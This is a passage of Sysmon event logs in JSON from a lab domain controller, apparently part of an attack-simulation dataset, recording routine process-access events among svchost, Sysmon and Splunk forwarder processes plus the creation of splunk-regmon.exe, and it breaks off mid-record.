{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0245-5F25-0000-0010CFD00500}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0245-5F25-0000-0010CFD00500}","TargetProcessId":"3464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.690\r\nSourceProcessGUID: {A837DB8D-0245-5F25-0000-0010CFD00500}\r\nSourceProcessId: 3464\r\nSourceThreadId: 3472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.690","SourceProcessGUID":"{A837DB8D-0245-5F25-0000-0010CFD00500}","SourceProcessId":"3464","SourceThreadId":"3472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.223\r\nProcessGuid: {A837DB8D-0246-5F25-0000-001071D20500}\r\nProcessId: 4272\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.223","ProcessGuid":"{A837DB8D-0246-5F25-0000-001071D20500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk 